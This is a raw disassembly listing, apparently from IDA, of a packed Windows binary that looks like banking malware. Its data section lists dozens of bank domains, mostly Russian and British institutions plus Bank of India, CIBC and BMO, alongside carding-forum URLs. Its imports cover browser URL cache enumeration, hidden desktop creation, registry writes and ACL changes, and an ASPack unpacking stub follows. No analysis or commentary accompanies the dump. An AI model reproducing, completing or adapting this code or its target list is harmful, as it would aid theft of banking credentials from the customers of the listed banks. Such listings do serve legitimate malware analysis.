; DATA XREF: .data:0041A150o aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0041A14Co aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0041A148o aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0041A144o aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0 ; DATA XREF: .data:0041A140o aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0041A13Co aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0041A138o aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0041A134o aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0041A130o aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0041A12Co aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0041A128o aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0041A124o aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0041A11Co aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0041A114o aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0041A110o aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0041A10Co aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0041A108o aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0041A104o aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0041A100o aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0041A0FCo aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0041A0F8o aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0041A0F4o aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0041A0F0o aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0041A0ECo aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0041A0E8o aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0041A0E4o aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0041A0E0o aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0041A0DCo aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0041A0D8o aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0041A0D4o aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0041A0D0o aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0041A0CCo aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0041A0C8o aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0041A0C4o aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0041A0C0o aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0041A0BCo ; .data:0041A120o aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0041A0B8o aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0041A0B4o aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0041A0B0o aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0041A0ACo ; .data:0041A118o aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_41A0A8o align 4 dword_425398 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_4253A8 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_404878+12Eo dword_4253B8 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_4253C8 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_4253D8 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_4253E8 dd 2 dup(0) dd 0C0h, 46000000h dword_4253F8 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_425408 dd 10h dup(0) ; sub_406EF0:loc_406F0Ao ... dword_425448 dd 0 ; sub_406E94:loc_406ED6o ... dd 0Fh dup(0) dword_425488 dd 0 ; sub_406FF9+825r dword_42548C dd 0 ; sub_406FF9+82Cr dword_425490 dd 0 ; sub_406FF9+834r dword_425494 dd 0 ; sub_406FF9+83Cr align 1000h _data ends ; Section 4. (virtual address 00026000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00001000 ( 4096.) ; Offset to raw data for section: 00026000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata segment para public 'DATA' use32 assume cs:_idata ;org 426000h off_426000 dd offset dword_42610C ; DATA XREF: .idata:00426DB0o dd 2 dup(0) dd offset dword_42610C dd offset dword_42610C off_426014 dd offset dword_42611C ; DATA XREF: .idata:00426DC0o ; .idata:00426DC4o align 10h dd offset dword_42611C dd offset dword_42611C off_426028 dd offset dword_426134 ; DATA XREF: .idata:00426DD4o ; .idata:00426DD8o ... dd 2 dup(0) dd offset dword_426134 dd offset dword_426134 off_42603C dd offset dword_426208 ; DATA XREF: .idata:00426DF4o ; .idata:00426DF8o ... dd 2 dup(0) dd offset dword_426208 dd offset dword_426208 off_426050 dd offset dword_426284 ; DATA XREF: .idata:00426ECCo ; .idata:00426ED0o ... dd 2 dup(0) dd offset dword_426284 dd offset dword_426284 off_426064 dd offset dword_4262A0 ; DATA XREF: .idata:00426F4Co ; .idata:00426F50o ... align 10h dd offset dword_4262A0 dd offset dword_4262A0 off_426078 dd offset dword_4262DC ; DATA XREF: .idata:00426F70o ; .idata:00426F74o ... dd 2 dup(0) dd offset dword_4262DC dd offset dword_4262DC off_42608C dd offset dword_42632C ; DATA XREF: .idata:00426FB0o ; .idata:00426FB4o ... dd 2 dup(0) dd offset dword_42632C dd offset dword_42632C dd 1Ah dup(0) dd 2655Ch dword_42610C dd 2 dup(0) ; .idata:0042600Co ... dd 26570h, 2658Ch dword_42611C dd 2 dup(0) ; .idata:00426020o ... dd 265A8h, 265BCh, 265D0h, 265E0h dword_426134 dd 2 dup(0) ; .idata:00426034o ... dd 265F4h, 26604h, 26620h, 26634h, 2664Ch, 26664h, 26674h dd 26684h, 2669Ch, 266B0h, 266C0h, 266D4h, 266ECh, 266FCh dd 2670Ch, 2671Ch, 2672Ch, 26744h, 2675Ch, 26770h, 26784h dd 26798h, 267B0h, 267BCh, 267D4h, 267E4h, 267F4h, 26804h dd 26814h, 26820h, 26830h, 26840h, 26850h, 2685Ch, 26868h dd 26878h, 2688Ch, 2689Ch, 268ACh, 268B4h, 268C8h, 268D8h dd 268E8h, 268F8h, 2690Ch, 26924h, 26930h, 2693Ch, 26948h dd 26954h, 26964h dword_426208 dd 2 dup(0) ; .idata:00426048o ... dd 26974h, 26988h, 26998h, 269A8h, 269B4h, 269C4h, 269D0h dd 269E8h, 269F8h, 26A04h, 26A10h, 26A24h, 26A34h, 26A44h dd 26A58h, 26A6Ch, 26A80h, 26A94h, 26AA8h, 26ABCh, 26AD0h dd 26AE0h, 26AECh, 26B00h, 26B10h, 26B24h, 26B34h, 26B44h dd 26B58h dword_426284 dd 2 dup(0) ; .idata:0042605Co ... dd 26B6Ch, 26B80h, 26B90h, 26BA0h, 26BB8h dword_4262A0 dd 2 dup(0) ; .idata:00426070o ... dd 26BC8h, 26BDCh, 26BF4h, 26C08h, 26C18h, 26C28h, 26C3Ch dd 26C50h, 26C64h, 26C78h, 26C8Ch, 26CA8h, 26CC0h dword_4262DC dd 2 dup(0) ; .idata:00426084o ... dd 26CDCh, 26CE4h, 26CF4h, 26D00h, 26D0Ch, 26D14h, 26D1Ch dd 26D28h, 26D34h, 26D40h, 26D48h, 26D50h, 26D5Ch, 26D68h dd 26D70h, 26D7Ch, 26D88h, 26D94h dword_42632C dd 2 dup(0) ; .idata:00426098o ... dword_426334 dd 77124C05h align 10h dword_426340 dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_426344 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA align 10h dword_426350 dd 774FFAC3h dword_426354 dd 7750CB9Ch dword_426358 dd 77502A37h dword_42635C dd 774FEE36h dd 2 dup(0) dword_426368 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_42636C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_426370 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_426374 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_426378 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_42637C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_426380 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_426384 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_426388 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_42638C dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_426390 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_426394 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_426398 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_42639C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4263A0 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4263A4 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4263A8 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4263AC dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4263B0 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4263B4 dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4263B8 dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4263BC dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4263C0 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4263C4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4263C8 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4263CC dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4263D0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4263D4 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4263D8 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4263DC dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4263E0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4263E4 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_4263E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_4263EC dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_4263F0 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_4263F4 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_4263F8 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_4263FC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_426400 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_426404 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_426408 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_42640C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_426410 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_426414 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_426418 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_42641C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_426420 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_426424 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_426428 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_42642C dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_426430 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 2 dup(0) dword_42643C dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_426440 dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_426444 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_426448 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_42644C dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_426450 dd 7E41DA60h ; resolved to->USER32.SetFocusdword_426454 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_426458 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_42645C dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_426460 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_426464 dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_426468 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_42646C dd 7E42E002h ; resolved to->USER32.GetMessageAdword_426470 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_426474 dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_426478 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_42647C dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_426480 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_426484 dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_426488 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_42648C dd 7E42F383h ; resolved to->USER32.SendMessageAdword_426490 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_426494 dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_426498 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_42649C dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4264A0 dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4264A4 dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4264A8 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcAdword_4264AC dd 7E41F642h ; resolved to->USER32.CallWindowProcA dd 2 dup(0) dword_4264B8 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4264BC dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4264C0 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4264C4 dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4264C8 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0) dword_4264D4 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4264D8 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4264DC dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4264E0 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4264E4 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_4264E8 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_4264EC dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_4264F0 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_4264F4 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_4264F8 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_4264FC dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_426500 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_426504 dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount align 10h dword_426510 dd 73D96FEBh dword_426514 dd 73D91C28h dword_426518 dd 73D92B86h dword_42651C dd 73D9A3B0h dword_426520 dd 73D9B9A2h dword_426524 dd 73D91F60h dword_426528 dd 73D9D320h dword_42652C dd 73D9D340h dword_426530 dd 73D9D5E0h dword_426534 dd 73D9242Ch dword_426538 dd 73D9DBAFh dword_42653C dd 73D92226h dword_426540 dd 73D9E5C5h dword_426544 dd 73D9DBA2h dword_426548 dd 73D9E61Eh dword_42654C dd 73D9E65Ch dword_426550 dd 73D9E69Ch dword_426554 dd 73D9F24Ch dd 0 dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0 dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch dd 6E456568h, 41797274h, 0 dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch dd 0 dd 78450081h, 72507469h, 7365636Fh, 73h, 78450083h, 646E6170h dd 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h, 417367h dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 654700DEh dd 72754374h, 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h dd 72754374h, 746E6572h, 65726854h, 64496461h, 0 dd 654700F8h, 6C694674h, 7A695365h, 65h, 654700FAh, 6C694674h dd 6D695465h, 65h, 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h dd 41656D61h, 0 dd 6547010Ch, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6C43001Bh dd 4865736Fh, 6C646E61h, 65h, 65470122h, 6F725074h, 64644163h dd 73736572h, 0 dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h dd 41h, 6547014Dh, 6D655474h, 74615070h, 4168h, 65470155h dd 63695474h, 756F436Bh, 746Eh, 6547015Ch, 72655674h, 6E6F6973h dd 0 dd 6547015Dh, 72655674h, 6E6F6973h, 417845h, 6547015Fh dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh dd 65470165h, 6E695774h, 73776F64h, 65726944h, 726F7463h dd 4179h, 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0 dd 6C47016Ch, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C47016Dh dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C470176h, 6C61626Fh dd 6F6D654Dh, 74537972h, 73757461h, 0 dd 6F430025h, 69467970h, 41656Ch, 6E490194h, 6C726574h dd 656B636Fh, 636E4964h, 656D6572h, 746Eh, 73490198h, 52646142h dd 50646165h, 7274h, 7349019Bh, 57646142h, 65746972h, 727450h dd 6F4C01A7h, 694C6461h, 72617262h, 4179h, 6F4C01ADh, 416C6163h dd 636F6C6Ch, 0 dd 6F4C01B1h, 466C6163h, 656572h, 704F01D2h, 754D6E65h dd 41786574h, 0 dd 704F01D4h, 72506E65h, 7365636Fh, 73h, 72430031h, 65746165h dd 656C6946h, 41h, 655201FAh, 69466461h, 656Ch, 7452020Eh dd 776E556Ch, 646E69h, 7452020Fh, 72655A6Ch, 6D654D6Fh dd 79726Fh, 6553023Ah, 6C694674h, 696F5065h, 7265746Eh dd 0 dd 6553023Ch, 6C694674h, 6D695465h, 65h, 7243003Ch, 65746165h dd 6574754Dh, 4178h, 6C530264h, 706565h, 6554026Ch, 6E696D72h dd 50657461h, 65636F72h, 7373h, 69560285h, 61757472h, 6C6C416Ch dd 636Fh, 69560287h, 61757472h, 6572466Ch, 65h, 6956028Ch dd 61757472h, 6575516Ch, 7972h, 72430041h, 65746165h, 636F7250h dd 41737365h, 0 dd 69570297h, 68436564h, 6F547261h, 746C754Dh, 74794269h dd 65h, 69570298h, 6578456Eh, 63h, 725702A2h, 46657469h dd 656C69h, 736C02C9h, 656C7274h, 416Eh, 736C02CAh, 656C7274h dd 576Eh, 72430047h, 65746165h, 65726854h, 6461h, 65440054h dd 6574656Ch, 656C6946h, 41h, 65470066h, 6E695774h, 54776F64h dd 41747865h, 0 dd 6547006Bh, 6E695774h, 52776F64h, 746365h, 69460070h dd 6957646Eh, 776F646Eh, 41h, 65470074h, 6E695774h, 776F64h dd 6547000Eh, 616C4374h, 614E7373h, 41656Dh, 655300C4h dd 636F4674h, 7375h, 654700C9h, 726F4674h, 6F726765h, 57646E75h dd 6F646E69h, 77h, 6F4C0016h, 75436461h, 726F7372h, 41h dd 6F4C0018h, 63496461h, 416E6Fh, 655300FEh, 6D695474h dd 7265h, 65520002h, 74736967h, 6C437265h, 41737361h, 0 dd 654D0134h, 67617373h, 786F4265h, 41h, 65470020h, 73654D74h dd 65676173h, 41h, 65470159h, 6E695774h, 4C776F64h, 41676E6Fh dd 0 dd 6553015Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0 dd 7243015Eh, 65746165h, 6B736544h, 41706F74h, 0 dd 65530165h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470166h dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540024h, 6C736E61h dd 4D657461h, 61737365h, 6567h, 69440025h, 74617073h, 654D6863h dd 67617373h, 4165h, 65530030h, 654D646Eh, 67617373h, 4165h dd 737701EAh, 6E697270h, 416674h, 6F50003Dh, 75517473h dd 654D7469h, 67617373h, 65h, 6853004Bh, 6957776Fh, 776F646Eh dd 0 dd 7243004Fh, 65746165h, 646E6957h, 7845776Fh, 41h, 65440051h dd 6F727473h, 6E695779h, 776F64h, 6F4D0056h, 69576576h dd 776F646Eh, 0 dd 6544005Bh, 6E695766h, 50776F64h, 41636F72h, 0 dd 6143005Dh, 69576C6Ch, 776F646Eh, 636F7250h, 41h, 65470089h dd 6F745374h, 624F6B63h, 7463656Ah, 0 dd 655300CAh, 436B4274h, 726F6C6Fh, 0 dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h dd 6Eh, 65520171h, 65724367h, 4B657461h, 78457965h, 41h dd 65520174h, 6F6C4367h, 654B6573h, 79h, 65520179h, 65704F67h dd 79654B6Eh, 417845h, 65520184h, 65755167h, 61567972h dd 4565756Ch, 4178h, 65520190h, 74655367h, 756C6156h, 41784565h dd 0 dd 654701CAh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CDh dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D4h, 746E4574h dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh dd 64695374h, 41627553h, 6F687475h, 79746972h, 0 dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0 dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah dd 7469h, 656D0253h, 706D636Dh, 0 dd 656D0254h, 7970636Dh, 0 dd 656D0256h, 7465736Dh, 0 dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h dd 0 dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h dd 666E6163h, 0 dd 74730271h, 74616372h, 0 dd 74730272h, 72686372h, 0 dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh dd 0 dd offset off_426000 aWininet_dll db 'WININET.DLL',0 dd offset off_426014 dd offset off_426014 aOle32_dll db 'ole32.DLL',0 align 4 dd offset off_426028 dd offset off_426028 dd offset off_426028 dd offset off_426028 aKernel32_dll_3 db 'KERNEL32.DLL',0 align 4 dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C dd offset off_42603C aUser32_dll_0 db 'USER32.DLL',0 align 4 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 dd offset off_426050 aGdi32_dll db 'GDI32.DLL',0 align 4 dd offset off_426064 dd offset off_426064 dd offset off_426064 dd offset off_426064 dd offset off_426064 aAdvapi32_dll_0 db 'ADVAPI32.DLL',0 align 10h dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 dd offset off_426078 aCrtdll_dll db 'CRTDLL.DLL',0 align 10h dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C dd offset off_42608C align 10h _idata ends ; Section 5. (virtual address 00027000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00027000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute _aspack segment para public 'CODE' use32 assume cs:_aspack ;org 427000h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing db 90h ; =============== S U B R O U T I N E ======================================= public start start proc near pusha call sub_427577 jmp short loc_427055 ; --------------------------------------------------------------------------- align 4 dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0) dd 2700001h, 0AD000000h, 0AC000000h, 809A5100h, 809AE47Ch dd 7Ch, 3 dup(0) db 0 ; --------------------------------------------------------------------------- loc_427055: ; CODE XREF: start+6j mov ebx, 4439A4h add ebx, ebp sub ebx, [ebp+4439D5h] cmp dword ptr [ebp+444804h], 0 mov [ebp+444804h], ebx jnz loc_4274DB lea eax, [ebp+44480Ch] push eax call dword ptr [ebp+444918h] mov [ebp+444808h], eax mov edi, eax lea ebx, [ebp+444819h] push ebx push eax call dword ptr [ebp+444914h] mov [ebp+4439E1h], eax lea ebx, [ebp+444826h] push ebx push edi call dword ptr [ebp+444914h] mov [ebp+4439E5h], eax lea eax, [ebp+443B72h] jmp eax ; --------------------------------------------------------------------------- align 10h dd 40h, 2 dup(0) dd 60000000h, 12190002h, 2 dup(0) dd 10000000h, 6E880000h, 0A0000000h, 0B4980001h, 60000000h dd 0FF80002h, 36h dup(0) dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh dd 75013E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h dd 0C2030A74h, 